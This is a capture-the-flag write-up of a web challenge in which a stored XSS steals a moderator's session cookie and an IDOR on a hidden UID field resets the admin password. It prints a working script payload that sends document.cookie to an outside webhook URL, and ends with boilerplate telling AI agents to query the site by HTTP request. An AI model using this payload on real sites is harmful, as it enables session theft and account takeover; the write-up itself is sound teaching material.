# 1️⃣ Web 300: Kryptos Support

<figure><img src="/files/TAzIz4KRyl94ucYWiKqr" alt=""><figcaption></figcaption></figure>

During my enumeration I got a field wherein you can submit via form, and another page which is a login portal.

<figure><img src="/files/fcZVHHWTUMNHQD0Th8sX" alt=""><figcaption></figcaption></figure>

I submitted a test content and got this:

<figure><img src="/files/hYuDjG5jSe1NsOEutAaR" alt=""><figcaption></figcaption></figure>

The response above gave me a hint of possible XSS attack. Which leads me to get an Admin Cookies/Session. I sent a crafted xss payload using <https://webhook.site>.

```
<script>
document.write('<img src="https://webhook.site/4805b428-e4e9-4754-9ff1-74f3b03e040d?c='+document.cookie+'" />');
</script>
```

Now I have the session cookies.

<figure><img src="/files/ane4WinIgzRk7sWZLQGM" alt=""><figcaption></figcaption></figure>

I installed a cookie editor to use the session that came from the results of my XSS attack.

<figure><img src="/files/fDe8C3GP9NiE5sYOEuop" alt=""><figcaption></figcaption></figure>

Then redirected to the admin panel. I didn't find any field or upload files, just the ticket that I submitted.

<figure><img src="/files/Evnguku3lUATRUYRJCEV" alt=""><figcaption></figcaption></figure>

Upon checking the links, I found a change password field. I tried to change the password of the current account, that's when I noticed that the account I compromised is a moderator.

<figure><img src="/files/aKhszfEbpehTwJNjYJtz" alt=""><figcaption></figcaption></figure>

So I thought that maybe there is an Admin account for this application. Next is enabling the inspect element functions of the browser to check some hidden fields, and that where I got the UID.

<figure><img src="/files/eRsz5sYvMf6Uumoot7L2" alt=""><figcaption></figcaption></figure>

I decided to edit the value to 1 and supplied my chosen password and click submit, then I received this message below

<figure><img src="/files/MXhXgrXYp1IVtnMP57cV" alt=""><figcaption></figcaption></figure>

I login using admin and my chosen password and was automatically redirected to Home Page with a Flag.

<figure><img src="/files/mvT7sCSCUmqSJQLPoO0v" alt=""><figcaption></figcaption></figure>

Conclusion: **The application is vulnerable to Persistent XSS and IDOR or known as Insecure Direct Object Reference.**


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ctf.laet4x.com/ctf-2022/htb-cyber-apocalypse-2022-intergalactic-chase/1-web-300-kryptos-support.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.